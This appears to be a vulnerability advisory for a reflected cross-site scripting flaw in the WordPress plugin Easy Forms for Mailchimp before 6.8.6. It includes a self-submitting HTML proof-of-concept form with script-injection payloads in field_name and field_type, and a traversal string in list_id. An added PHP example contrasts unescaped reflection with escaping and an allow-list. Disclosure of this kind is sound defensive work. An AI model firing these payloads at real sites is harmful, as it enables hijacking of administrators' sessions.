wpexploit JrXnm WPEX-ID:50BE0EBF-FE6D-41E5-8AF9-0D74F33AEB57
History: Dec 21, 2021 - 12:00 a.m.

Easy Forms for Mailchimp < 6.8.6 - Reflected Cross-Site Scripting

2021-12-21 00:00:00
JrXnm
68

EPSS: 0.001 Low
Percentile: 30.1%

The plugin does not sanitise and escape the field_name and field_type parameters before outputting them back in attributes, leading to Reflected Cross-Site Scripting issues.

<html>
  <body>
    <form action="https://example.com/wp-admin/admin-ajax.php" id="hack" method="POST">
      <input type="hidden" name="action" value="add_field_to_form" />
      <input type="hidden" name="field_name" value='xxxxxxxxxxxx"><script>alert(/XSS-field_name/)</script>' />
      <input type="hidden" name="field_type" value='"><script>alert(/XSS-field_type/)</script>' />
      <input type="hidden" name="list_id" value="../../../../../" />
      <input type="submit" value="Submit request" />
    </form>
  </body>

  <script>
    var form1 = document.getElementById('hack');
    form1.submit();
</script>
</html>
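
The missing attribute escaping described above, shown next to a hardened form. This is an added example, not the plugin's code: the function names, the markup and the allow-list of field types are assumptions, and the esc_attr() stand-in is defined only so the file runs outside WordPress.

```php
<?php
// Added illustration; NOT the plugin's source. Function names, markup and the
// allow-list of field types are hypothetical.

// Stand-in so the file runs outside WordPress. Inside WordPress the core
// esc_attr() already exists and this definition is skipped.
if (!function_exists('esc_attr')) {
    function esc_attr($text) {
        return htmlspecialchars((string) $text, ENT_QUOTES, 'UTF-8');
    }
}

// Vulnerable pattern: request values concatenated straight into attributes.
function render_field_vulnerable(array $post): string {
    return '<input type="text" data-field-name="' . $post['field_name']
         . '" data-field-type="' . $post['field_type'] . '" />';
}

// Hardened pattern: validate field_type against known values, then escape
// every value for the attribute context at the point of output.
function render_field_hardened(array $post): ?string {
    $allowed_types = ['text', 'email', 'number', 'dropdown']; // assumed list
    $name = isset($post['field_name']) ? (string) $post['field_name'] : '';
    $type = isset($post['field_type']) ? (string) $post['field_type'] : '';
    if (!in_array($type, $allowed_types, true)) {
        return null; // reject instead of reflecting unknown input
    }
    return '<input type="text" data-field-name="' . esc_attr($name)
         . '" data-field-type="' . esc_attr($type) . '" />';
}

// Parameter values taken from the proof of concept on this page.
$poc = [
    'field_name' => 'xxxxxxxxxxxx"><script>alert(/XSS-field_name/)</script>',
    'field_type' => '"><script>alert(/XSS-field_type/)</script>',
];

// Raw reflection: the quote in each value ends the attribute early.
echo render_field_vulnerable($poc), PHP_EOL;

// The allow-list rejects the PoC field_type before anything is rendered.
var_dump(render_field_hardened($poc));

// With a valid type, field_name is entity-encoded and stays inside its attribute.
$poc['field_type'] = 'text';
echo render_field_hardened($poc), PHP_EOL;
```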
